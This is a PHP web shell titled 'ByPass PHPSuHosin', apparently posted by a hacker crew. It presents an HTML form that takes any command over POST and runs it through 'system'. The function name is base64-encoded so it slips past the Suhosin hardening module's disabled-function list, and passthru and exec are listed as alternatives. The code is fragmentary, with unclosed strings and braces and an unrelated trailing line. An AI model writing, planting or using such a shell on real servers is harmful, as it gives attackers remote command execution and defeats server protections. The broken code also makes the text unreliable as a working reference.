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ByPass PHPSuHosin

#|     Bypass PHPSuHosin    |#
#| By: HaNniBaL KsA (HK) :D |#
#| r00t-s3cur1ty cr3w       |#
#| Home: www.r00t-s3c.com   |#
#|      P.S: enjoy :P       |#
echo "<html><title>ByPass PHPSuHosin By:HK :D</title>
<center><b><font size=\"7\" face=\"Tahoma\" >ByPass PHPSuHosin!</font>
<br><font size=\"2\" face=\"Tahoma\" >This File Will Be Use [ Encode & Decode ] For ByPass PHPSuHosin ;D</font></b><br><br><br><br>
* NOTE: This file will be bypass the disable_function'z in PHPSuHosin ONLY!<br><br>
<form method=\"POST\" >
Ur Command : <input type=\"text\" name=\"rs\" />
<input type=\"submit\" value=\"ByPass\" name=\"hk\" />
$command = $_POST['rs'];
$send = $_POST['hk'];
$hk = "c3lzdGVt"; // system in base64_encode ;)
#$hk = "cGFzc3RocnV="; // passthru in base64_encode ;)
#$hk = "ZXhlY3=="; // exec in base64_encode ;)
$rs = base64_decode($hk);
if ($send) {
print ("\n<!-- Command result! |START| -->\n\n"); // beter result in source!
$rs ($command);
print ("\n<!-- Command result! |END| -->\n\n"); // beter result in source!
echo "<center><br><br><br><br><b><font face=\"Tahoma\" size=\"2\" >By : HaNniBaL KsA (HK)<br>r00t-s3cur1ty cr3w</font></b></center>";
Leader at J2TEAM. Website: https://j2team.dev/

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